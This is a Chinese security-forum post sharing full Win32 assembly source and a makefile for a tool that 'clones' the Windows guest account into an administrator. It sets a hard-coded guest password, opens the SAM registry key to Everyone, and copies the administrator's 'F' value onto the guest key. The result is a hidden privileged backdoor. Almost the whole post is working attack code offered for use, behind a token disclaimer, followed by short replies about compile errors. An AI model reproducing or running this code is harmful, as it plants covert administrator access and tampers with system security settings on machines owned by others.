[原创]Win32汇编版 Guest 帐号克隆工具
文章作者:taiwansee信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
刚学WIN32汇编不久。。写了个把guest克隆成1f4帐号的小程序。。
在2000/xp/2003/2008 RC0 上测试成功。。
现开放源代码,发现bug请跟贴。。
[b][color=#FF0000]注意:本文中的代码只做技术学习讨论,不可用作非法用途。[/color][/b]
[language=asm]
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Win32汇编版 Guest帐号克隆工具
;
; By taiwansee 2007-11-10
;
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff Clone.asm
; Link /subsystem:windows Clone.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Target/assembler model: 80386 instruction set, flat 32-bit memory
; model, STDCALL calling convention for invoke/proc, case-sensitive
; identifiers (required because the Win32 include files mix case).
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include netapi32.inc
includelib netapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.const
; DEBUG selects the diagnostic build: every "if DEBUG ... endif" block
; below (MessageBox reporting and the jmp @F error exits in _Clone) is
; assembled only when this is non-zero. With 0 no API return value is
; checked at all.
DEBUG equ 0
; Short alias for the registry root used by the RegOpenKeyEx calls.
HKLM equ HKEY_LOCAL_MACHINE
if DEBUG
; Only referenced by the DEBUG result reporting in _SetAccountPassword.
NERR_SUCCESS equ 0
endif
.data?
; Uninitialised structures filled in at run time:
;  stExplicitAccess - the single ACE handed to SetEntriesInAcl (zeroed
;                     by RtlZeroMemory before use in _Clone)
;  stUserInfo       - USER_INFO_1003, only its password field is set
stExplicitAccess EXPLICIT_ACCESS <>
stUserInfo USER_INFO_1003 <>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
; Diagnostic strings and scratch buffer, assembled only when DEBUG != 0.
if DEBUG
szCaption db 'Debug info......',0
szFailed db 'Open Subkey Failed!!!',0
szSuccess db 'Open Subkey Success!!!',0
szCloseSuccess db 'Close Subkey Success!!!',0
szCloseFailed db 'Close Subkey Failed!!!',0
szQueryValueSuccess db 'Query Value Success!!!',0
szQueryValueFailed db 'Query Value Failed!!!',0
szSetValueSuccess db 'Set Value Success!!!',0
szSetValueFailed db 'Set Value Failed!!!',0
szGetNamedSecurityInfoSuccess db 'Get Named Security Info Success!!!',0
szGetNamedSecurityInfoFailed db 'Get Named Security Info Failed!!!',0
szSetEntriesInAclSuccess db 'Set Entries In Acl Success!!!',0
szSetEntriesInAclFailed db 'Set Entries In Acl Failed!!!',0
szSetNamedSecurityInfoSuccess db 'Set Named Security Info Success!!!',0
szSetNamedSecurityInfoFailed db 'Set Named Security Info Failed!!!',0
szLocalFreeFailed1 db 'Local Free @lpSecurityDescriptor Failed!!!',0
szLocalFreeFailed2 db 'Local Free @lpOldDACL Failed!!!',0
szLocalFreeFailed3 db 'Local Free @lpNewDACL Failed!!!',0
szNetUserSetInfoSuccess db 'Net User Set Info Success!!!',0
szERROR_ACCESS_DENIED db 'szERROR_ACCESS_DENIED',0
szNERR_InvalidComputer db 'szNERR_InvalidComputer',0
szNERR_NotPrimary db 'szNERR_NotPrimary',0
szNERR_UserNotFound db 'szNERR_UserNotFound',0
szNERR_PasswordTooShort db 'szNERR_PasswordTooShort',0
szNetUserChangePasswordSuccess db 'szNetUserChangePasswordSuccess',0
szNetUserChangePasswordOtherError db 'szNetUserChangePasswordOtherError',0
szNERR_LastAdmin db 'szNERR_LastAdmin',0
szNERR_BadPassword db 'szNERR_BadPassword',0
szNERR_SpeGroupOp db 'szNERR_SpeGroupOp',0
; wsprintf scratch buffer and "%d" format for printing API return codes.
szBuffer db 2048 dup(0)
szFormat db '%d',0
endif
; Name of the registry value read from szSubKey1 and written to szSubKey2.
szValueName db 'F',0
; Object name passed to Get/SetNamedSecurityInfo with SE_REGISTRY_KEY:
; the DACL of this key is what _Clone rewrites (this is the change an
; auditor of the SAM hive's permissions would see).
szObject db 'MACHINE\SAM\SAM',0
; Trustee names (TRUSTEE_IS_NAME) for the two ACEs built in _Clone:
; first "Everyone" gets KEY_ALL_ACCESS, later the entry is re-pointed
; at "System".
szAccessUser db 'Everyone',0
szSystemUser db 'System',0
; Per-user SAM keys, relative to HKEY_LOCAL_MACHINE. The RID is the
; key name (0x1F4 = 500, 0x1F5 = 501).
szSubKey1 db 'SAM\SAM\Domains\Account\Users\000001F4',0
szSubKey2 db 'SAM\SAM\Domains\Account\Users\000001F5',0
; Null-terminated UTF-16 strings (one dw per character) for the Unicode
; NetUserSetInfo call. The password is stored in clear text in the
; image's .data section, so it is recoverable from the binary itself.
szUserPassword dw 'E','v','i','l','o','c','t','a','l','2','0','0','7',00
szAccountName dw 'g','u','e','s','t',00
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
_SetAccountPassword proc
;-----------------------------------------------------------------------
; Sets the password of the local account named by szAccountName
; ("guest") to the fixed wide string szUserPassword, using
; NetUserSetInfo at information level 1003 (USER_INFO_1003).
; ABI:   STDCALL (MASM proc), no parameters
; In:    nothing; reads the module-level strings and stUserInfo
; Out:   eax = NET_API_STATUS from NetUserSetInfo (release build; the
;        DEBUG build overwrites eax with the MessageBox result)
; Note:  servername NULL = local computer, parm_err NULL.
; Note:  with DEBUG = 0 the status is never examined, so a failure
;        (e.g. ERROR_ACCESS_DENIED when not running elevated) is silent.
; Note(review): @lpError and @lpNULL are declared but never used.
;-----------------------------------------------------------------------
local @lpError:dword
local @lpNULL:dword
; Only the password member of USER_INFO_1003 is meaningful at level 1003.
mov stUserInfo.usri1003_password,offset szUserPassword
invoke NetUserSetInfo,NULL,\
offset szAccountName,\
1003,\
offset stUserInfo,\
NULL
; Diagnostic build only: map the common NET_API_STATUS codes to a
; message box so the failure reason is visible.
if DEBUG
.if eax==ERROR_ACCESS_DENIED
invoke MessageBox,NULL,offset szERROR_ACCESS_DENIED,offset szCaption,MB_OK
.elseif eax==NERR_InvalidComputer
invoke MessageBox,NULL,offset szNERR_InvalidComputer,offset szCaption,MB_OK
.elseif eax==NERR_NotPrimary
invoke MessageBox,NULL,offset szNERR_NotPrimary,offset szCaption,MB_OK
.elseif eax==NERR_UserNotFound
invoke MessageBox,NULL,offset szNERR_UserNotFound,offset szCaption,MB_OK
.elseif eax==NERR_PasswordTooShort
invoke MessageBox,NULL,offset szNERR_PasswordTooShort,offset szCaption,MB_OK
.elseif eax==NERR_SpeGroupOp
invoke MessageBox,NULL,offset szNERR_SpeGroupOp,offset szCaption,MB_OK
.elseif eax==NERR_BadPassword
invoke MessageBox,NULL,offset szNERR_BadPassword,offset szCaption,MB_OK
.elseif eax==NERR_LastAdmin
invoke MessageBox,NULL,offset szNERR_LastAdmin,offset szCaption,MB_OK
.elseif eax==NERR_SUCCESS
invoke MessageBox,NULL,offset szNetUserChangePasswordSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szNetUserChangePasswordOtherError,offset szCaption,MB_OK
.endif
endif
ret
_SetAccountPassword endp
_Clone proc
;-----------------------------------------------------------------------
; Copies the binary value "F" from the SAM user key ...\000001F4 to the
; user key ...\000001F5 (szSubKey1 -> szSubKey2).
;
; Steps:
;   1. Read the current DACL of MACHINE\SAM\SAM (GetNamedSecurityInfo).
;   2. Build one EXPLICIT_ACCESS entry granting "Everyone" KEY_ALL_ACCESS
;      with container/object inheritance, merge it into the old DACL
;      (SetEntriesInAcl) and apply it (SetNamedSecurityInfo).
;   3. Open both user keys with KEY_ALL_ACCESS, RegQueryValueEx "F" from
;      key 1 into a 4096-byte local buffer, RegSetValueEx it as
;      REG_BINARY on key 2, close both keys.
;   4. Re-point the same EXPLICIT_ACCESS entry at "System", build a DACL
;      from it alone (old ACL = NULL) and apply that to MACHINE\SAM\SAM.
;   5. LocalFree the descriptor and both ACL pointers.
;
; ABI:   STDCALL (MASM proc), no parameters
; In:    nothing; reads module-level strings and stExplicitAccess
; Out:   nothing usable - pushad/popad restore every general register,
;        including eax, so no status reaches the caller.
; Regs:  esi = &stExplicitAccess from the mov below until
;        "assume esi:nothing"; all registers are restored by popad.
; Stack: two 4096-byte local buffers plus a few dwords.
;
; Note:  with DEBUG = 0 no return value is checked; every call runs
;        regardless of whether the previous one succeeded, and the
;        @@ label is never jumped to.
; Note(review): step 4 does NOT put the original DACL back, despite the
;        comment in the original. The second SetEntriesInAcl is given a
;        NULL old ACL and writes its result into @lpOldDACL, so the
;        pointer obtained in step 1 is lost and the key is left with a
;        DACL containing only the "System" entry built here. That
;        altered DACL on the SAM key is a persistent, observable
;        artifact of this program having run.
; Note(review): in the DEBUG build an early "jmp @F" reaches the
;        LocalFree calls while @lpNewDACL is still uninitialised and
;        @lpOldDACL still points into the descriptor returned by
;        GetNamedSecurityInfo (which, per the API contract, should not be
;        freed separately) - worth confirming before relying on the
;        diagnostic build.
;-----------------------------------------------------------------------
local @hSubkey1:dword,\
@hSubkey2:dword,\
@szBuffer[4096]:byte,\
@szDataType:dword,\
@szDataBuffer[4096]:byte,\
@szDataBufferSize:dword,\
@lpOldDACL:dword,\
@lpNewDACL:dword,\
@lpSecurityDescriptor:dword
pushad
; Step 1: fetch the current DACL of the SAM key.
; @lpOldDACL receives a pointer into @lpSecurityDescriptor.
invoke GetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
addr @lpOldDACL,\
NULL,\
addr @lpSecurityDescriptor
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szGetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szGetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Clear the EXPLICIT_ACCESS structure before filling it in.
invoke RtlZeroMemory,offset stExplicitAccess,sizeof stExplicitAccess
; Step 2: build one ACE granting Everyone full control of the key, and
; let sub-keys/objects inherit it.
mov esi,offset stExplicitAccess
assume esi:ptr EXPLICIT_ACCESS
mov [esi].grfAccessPermissions,KEY_ALL_ACCESS
mov [esi].grfAccessMode,SET_ACCESS
mov [esi].grfInheritance,SUB_CONTAINERS_AND_OBJECTS_INHERIT;allow sub-objects to inherit this permission
mov [esi].Trustee.pMultipleTrustee,NULL
mov [esi].Trustee.MultipleTrusteeOperation,NO_MULTIPLE_TRUSTEE
mov [esi].Trustee.TrusteeForm,TRUSTEE_IS_NAME
mov [esi].Trustee.TrusteeType,TRUSTEE_IS_GROUP
mov [esi].Trustee.ptstrName,offset szAccessUser
; Merge the new ACE into the existing DACL -> @lpNewDACL (LocalAlloc'd).
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
@lpOldDACL,\
addr @lpNewDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Apply the widened DACL to the SAM key.
invoke SetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
@lpNewDACL,\
NULL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szSetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Step 3: in/out size for RegQueryValueEx (capacity of @szDataBuffer).
mov @szDataBufferSize,sizeof @szDataBuffer
; Open target sub-key 1 (...\000001F4).
invoke RegOpenKeyEx,HKLM,offset szSubKey1,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey1
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Open target sub-key 2 (...\000001F5).
invoke RegOpenKeyEx,HKLM,offset szSubKey2,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Read value "F" from key 1; @szDataBufferSize becomes the byte count.
invoke RegQueryValueEx,@hSubkey1,\
offset szValueName,\
0,\
addr @szDataType,\
addr @szDataBuffer,\
addr @szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szQueryValueSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szQueryValueFailed,offset szCaption,MB_OK
jmp @F
.endif
invoke wsprintf,addr @szBuffer,offset szFormat,@szDataBufferSize
invoke MessageBox,NULL,addr @szBuffer,offset szCaption,MB_OK
endif
; Write the same bytes to value "F" of key 2 as REG_BINARY (the type
; read back in @szDataType is not used).
invoke RegSetValueEx,@hSubkey2,\
offset szValueName,\
0,\
REG_BINARY,\
addr @szDataBuffer,\
@szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetValueSuccess,offset szCaption,MB_OK
.else
push eax
invoke MessageBox,NULL,offset szSetValueFailed,offset szCaption,MB_OK
pop eax
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
jmp @F
.endif
endif
; Close both keys; only the second close's status is reported in DEBUG.
invoke RegCloseKey,@hSubkey1
invoke RegCloseKey,@hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szCloseSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szCloseFailed,offset szCaption,MB_OK
.endif
endif
; Step 4: reuse the same EXPLICIT_ACCESS entry with the trustee changed
; to "System" (all other fields, including KEY_ALL_ACCESS and the
; inheritance flag, stay as set above). See the header note: this is a
; replacement DACL, not a restore of the original.
mov [esi].Trustee.ptstrName,offset szSystemUser
assume esi:nothing
; Build a DACL from this single ACE (old ACL = NULL). The result is
; stored over @lpOldDACL, discarding the pointer from step 1.
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
NULL,\
addr @lpOldDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Apply the System-only DACL to the SAM key.
invoke SetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
@lpOldDACL,\
NULL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szSetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
; Step 5: common clean-up. Target of every "jmp @F" in the DEBUG build;
; in the release build execution simply falls through to here.
@@:
invoke LocalFree,@lpSecurityDescriptor
if DEBUG
.if eax!=0
invoke MessageBox,NULL,offset szLocalFreeFailed1,offset szCaption,MB_OK
.endif
endif
; On the normal path this is the ACL allocated by the second
; SetEntriesInAcl (see header note for the early-exit case).
invoke LocalFree,@lpOldDACL
if DEBUG
.if eax!=0
invoke MessageBox,NULL,offset szLocalFreeFailed2,offset szCaption,MB_OK
.endif
endif
invoke LocalFree,@lpNewDACL
if DEBUG
.if eax!=0
invoke MessageBox,NULL,offset szLocalFreeFailed3,offset szCaption,MB_OK
.endif
endif
popad
ret
_Clone endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Program entry point (named by "end start" below): change the guest
; password, then perform the SAM key copy, then exit with code 0.
; Neither call's outcome is examined, so the exit code is always 0.
start:
call _SetAccountPassword
call _Clone
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
[/language]
makefile文件
[code]
# nmake script producing Clone.exe; mirrors the "ml /c /coff" and
# "Link /subsystem:windows" lines given in the source header.
# NOTE(review): nmake expects the command lines under each target
# (Link, ml, del) to be indented; they appear at column 0 here, which
# looks like indentation lost when the file was pasted into the post.
NAME = Clone
OBJS = $(NAME).obj
LINK_FLAG = /subsystem:windows
ML_FLAG = /c /coff
# Link the object file into a GUI-subsystem executable.
$(NAME).exe: $(OBJS)
Link $(LINK_FLAG) $(OBJS)
# Inference rule: assemble any .asm into a COFF .obj ($< = the source).
.asm.obj:
ml $(ML_FLAG) $<
# Remove build products.
clean:
del *.obj
del *.exe
del *.res
del *.bak
[/code]
谢谢LZ的共享精神哦,不过你的代码在编译的时候会有很多错误。LZ最好是在把代码贴出来的同时,把源代码打包一下以附件的形式一起发上来。因为从网页上复制粘贴的代码会有莫名其妙的错误哦
感谢1楼mika 的提醒!
现把源代码、makefile文件、编译好的程序、windows.inc文件一起打包附上。
编译的时候请先备份自己的 masm32\include\windows.inc文件,然后用附件中的windows.inc替换之。